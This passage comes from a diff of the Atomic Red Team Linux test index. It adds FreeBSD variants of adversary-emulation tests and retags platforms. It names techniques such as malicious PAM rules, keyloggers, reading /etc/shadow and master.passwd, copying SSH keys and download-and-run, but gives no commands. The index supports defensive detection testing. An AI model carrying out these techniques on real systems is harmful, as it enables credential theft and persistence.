nobody (Linux) [linux] + - Atomic Test #13: Login as nobody (freebsd) [linux] - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) # persistence 
@@ -208,6 +248,7 @@ - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] + - Atomic Test #2: Malicious PAM rule (freebsd) [linux] - Atomic Test #3: Malicious PAM module [linux] - T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1501 Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -216,31 +257,36 @@ - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos] - - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos] - - Atomic Test #3: Firefox [freebsd, linux, windows, macos] + - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) - Atomic Test #1: Trap EXIT [macos, linux] + - Atomic Test #2: Trap EXIT (freebsd) 
[linux] - Atomic Test #3: Trap SIGINT [macos, linux] + - Atomic Test #4: Trap SIGINT (freebsd) [linux] - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md) - Atomic Test #1: Create a user account on a Linux system [linux] + - Atomic Test #2: Create a user account on a FreeBSD system [linux] - Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux] + - Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux] - T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - - Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux] + - Atomic Test #1: Modify SSH Authorized Keys [linux, macos] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md) - Atomic Test #4: Active Directory Create Admin Account [linux] 
@@ -264,8 +310,9 @@ - [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) - Atomic Test #1: Add command to .bash_profile [macos, linux] - Atomic Test #2: Add command to .bashrc [macos, linux] - - Atomic Test #4: Append to the system shell profile [freebsd, linux] - - Atomic Test #5: Append commands user shell profile [freebsd, linux] + - Atomic Test #3: Add command to .shrc [linux] + - Atomic Test #4: Append to the system shell profile [linux] + - Atomic Test #5: Append commands user shell profile [linux] - Atomic Test #6: System shell profile scripts [linux] - Atomic Test #7: Create/Append to .bash_logout [linux] - T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -278,24 +325,31 @@ - [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) - Atomic Test #2: rc.common [linux] - Atomic Test #3: rc.local [linux] + - Atomic Test #4: rc.local (FreeBSD) [linux] - [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create SysV Service [linux] - Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #2: At - Schedule a job [linux] + - Atomic Test #3: At - Schedule a job freebsd [linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] + - Atomic Test #13: Login as nobody (freebsd) [linux] # command-and-control - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #1: Base64 Encoded data. 
[macos, linux] + - Atomic Test #2: Base64 Encoded data (freebsd) [linux] - T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -324,9 +378,10 @@ - T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux] + - Atomic Test #5: Tor Proxy Usage - FreeBSD [linux] - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1571 Non-Standard Port](../../T1571/T1571.md) - - Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos] + - Atomic Test #2: Testing usage of uncommonly used port [linux, macos] - T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -337,20 +392,20 @@ - T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) - - Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos] + - Atomic Test #3: Malicious User Agents - Nix [linux, macos] - [T1105 Ingress Tool Transfer](../../T1105/T1105.md) - - Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos] - - Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos] - - Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos] - - Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #14: whois file download [freebsd, linux, macos] + - Atomic Test #1: rsync remote file copy (push) [linux, macos] + - Atomic Test #2: rsync remote file copy (pull) [linux, macos] + - Atomic Test #3: scp remote file copy (push) [linux, macos] + - Atomic Test #4: scp remote file copy (pull) [linux, macos] + - Atomic Test #5: sftp remote file copy (push) [linux, macos] + - Atomic Test #6: sftp remote file copy (pull) [linux, macos] + - Atomic Test #14: whois file download [linux, macos] - Atomic Test #27: Linux Download File and Run [linux] - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md) - - Atomic Test #1: Connection Proxy [freebsd, macos, linux] + - Atomic Test #1: Connection Proxy [linux, macos] - T1094 Custom Command and Control Protocol [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -359,18 +414,21 @@ # collection - [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) - Atomic Test #5: Data Compressed - nix - zip [linux, macos] - - Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos] - - Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos] - - Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux] + - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos] + - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] + - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos] - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos] - [T1113 Screen Capture](../../T1113/T1113.md) - Atomic Test #3: X Windows Capture [linux] + - Atomic Test #4: X Windows Capture (freebsd) [linux] - Atomic Test #5: Capture Linux Desktop using Import Tool [linux] + - Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [linux] - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] - Atomic Test #3: Logging bash history to syslog [linux] - - Atomic Test #5: Bash session based keylogger [freebsd, linux] + - Atomic Test #4: Logging sh history to syslog/messages [linux] + - Atomic Test #5: Bash session based keylogger [linux] - Atomic Test #6: SSHD PAM keylogger [linux] - Atomic Test #7: Auditd keylogger [linux] - T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -379,16 +437,17 @@ - T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) - Atomic Test #2: Stage data from Discovery.sh [linux, macos] + - Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux] - T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1115 Clipboard Data](../../T1115/T1115.md) - Atomic Test #5: Add or copy content to clipboard with xClip [linux] - T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) - - Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [freebsd, linux] + - Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux] + - Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux] + - Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux] + - Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux] - T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -421,13 +480,17 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - Atomic Test #1: Sudo usage [macos, linux] + - Atomic Test #2: Sudo usage (freebsd) [linux] - Atomic Test #3: Unlimited sudo cache timeout [macos, linux] + - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux] - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux] + - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux] - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -435,7 +498,9 @@ - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) - Atomic Test #1: Trap EXIT [macos, linux] + - Atomic Test #2: Trap EXIT (freebsd) [linux] - Atomic Test #3: Trap SIGINT [macos, linux] + - Atomic Test #4: Trap SIGINT (freebsd) [linux] - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] 
@@ -443,12 +508,15 @@ - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] + - Atomic Test #2: Make and modify binary from C source (freebsd) [linux] - Atomic Test #3: Set a SetUID flag on file [macos, linux] + - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux] - Atomic Test #5: Set a SetGID flag on file [macos, linux] + - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux] - Atomic Test #7: Make and modify capabilities of a binary [linux] - Atomic Test #8: Provide the SetUID capability to a file [linux] - - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux] - - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux] + - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux] + - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux] - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) 
@@ -464,8 +532,9 @@ - [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) - Atomic Test #1: Add command to .bash_profile [macos, linux] - Atomic Test #2: Add command to .bashrc [macos, linux] - - Atomic Test #4: Append to the system shell profile [freebsd, linux] - - Atomic Test #5: Append commands user shell profile [freebsd, linux] + - Atomic Test #3: Add command to .shrc [linux] + - Atomic Test #4: Append to the system shell profile [linux] + - Atomic Test #5: Append commands user shell profile [linux] - Atomic Test #6: System shell profile scripts [linux] - Atomic Test #7: Create/Append to .bash_logout [linux] - T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -476,43 +545,56 @@ - [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) - Atomic Test #2: rc.common [linux] - Atomic Test #3: rc.local [linux] + - Atomic Test #4: rc.local (FreeBSD) [linux] - [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create SysV Service [linux] - Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #2: At - Schedule a job [linux] + - Atomic Test #3: At - Schedule a job freebsd [linux] - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] + - Atomic Test #13: Login as nobody (freebsd) [linux] # credential-access - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] + - Atomic Test #2: Malicious PAM rule (freebsd) [linux] - Atomic Test #3: Malicious PAM module [linux] - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] - Atomic Test #3: Logging bash history to syslog [linux] - - 
Atomic Test #5: Bash session based keylogger [freebsd, linux] + - Atomic Test #4: Logging sh history to syslog/messages [linux] + - Atomic Test #5: Bash session based keylogger [linux] - Atomic Test #6: SSHD PAM keylogger [linux] - Atomic Test #7: Auditd keylogger [linux] - [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md) - Atomic Test #5: SUDO Brute Force - Debian [linux] - Atomic Test #6: SUDO Brute Force - Redhat [linux] + - Atomic Test #7: SUDO Brute Force - FreeBSD [linux] - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) - Atomic Test #1: Dump individual process memory with sh (Local) [linux] - - Atomic Test #3: Dump individual process memory with Python (Local) [freebsd, linux] + - Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux] + - Atomic Test #3: Dump individual process memory with Python (Local) [linux] - Atomic Test #4: Capture Passwords with MimiPenguin [linux] - T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux] + - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux] + - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux] + - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux] - Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW 
with sudo [linux] - Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux] - Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux] 
@@ -528,19 +610,23 @@ - Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux] - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) - - Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux] + - Atomic Test #2: Discover Private SSH Keys [linux, macos] - Atomic Test #3: Copy Private SSH Keys with CP [linux] + - Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [linux] - Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux] + - Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux] - Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux] + - Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux] - T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] + - Atomic Test #2: Search Through sh History [linux] - [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) - - Atomic Test #1: Find AWS credentials [freebsd, macos, linux] - - Atomic Test #3: Extract passwords with grep [freebsd, macos, linux] - - Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux] + - Atomic Test #1: Find AWS credentials [macos, linux] + - Atomic Test #3: Extract passwords with grep [linux, macos] + - Atomic Test #6: Find and Access Github Credentials [linux, macos] - T1606.001 Web Cookies [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -549,95 +635,112 @@ - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) - Atomic Test #1: SSH Credential Stuffing From Linux [linux] + - Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux] - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) - Atomic Test #1: Access /etc/shadow (Local) [linux] - - Atomic Test #3: Access /etc/passwd (Local) [freebsd, linux] - - Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [freebsd, linux] - - Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [freebsd, linux] + - Atomic Test #2: Access /etc/master.passwd (Local) [linux] + - Atomic Test #3: Access /etc/passwd (Local) [linux] + - Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux] + - Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux] - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) # discovery - [T1033 System Owner/User Discovery](../../T1033/T1033.md) - - Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos] + - Atomic Test #2: System Owner/User 
Discovery [linux, macos] - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md) - Atomic Test #23: Active Directory Domain Search [linux] - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md) - - Atomic Test #1: Enumerate all accounts (Local) [freebsd, linux] - - Atomic Test #2: View sudoers access [freebsd, linux, macos] - - Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos] - - Atomic Test #4: List opened files by user [freebsd, linux, macos] + - Atomic Test #1: Enumerate all accounts (Local) [linux] + - Atomic Test #2: View sudoers access [linux, macos] + - Atomic Test #3: View accounts with UID 0 [linux, macos] + - Atomic Test #4: List opened files by user [linux, macos] - Atomic Test #5: Show if a user account has ever logged in remotely [linux] - - Atomic Test #7: Enumerate users and groups [freebsd, linux, macos] + - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux] + - Atomic Test #7: Enumerate users and groups [linux, macos] - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #1: Detect Virtualization Environment (Linux) [linux] + - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux] - [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #15: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS [linux] - [T1007 System Service Discovery](../../T1007/T1007.md) - Atomic Test #3: System Service Discovery - systemctl [linux] + - Atomic Test #4: System Service Discovery - service 
[linux] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux] + - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux] + - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux] + - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux] - Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux] - Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux] - Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux] - Atomic Test #15: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux] - [T1135 Network Share Discovery](../../T1135/T1135.md) - Atomic Test #2: Network Share Discovery - linux [linux] + - Atomic Test #3: Network Share Discovery - FreeBSD [linux] - T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1082 System Information Discovery](../../T1082/T1082.md) - - Atomic Test #3: List OS Information [freebsd, linux, macos] + - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #4: Linux VM Check via Hardware [linux] - Atomic Test #5: Linux VM Check via Kernel Modules [linux] - - Atomic Test #8: Hostname Discovery [freebsd, linux, macos] - - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux] + - Atomic Test #6: FreeBSD VM Check via Kernel Modules [linux] + - Atomic Test #8: Hostname Discovery [linux, macos] + - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, 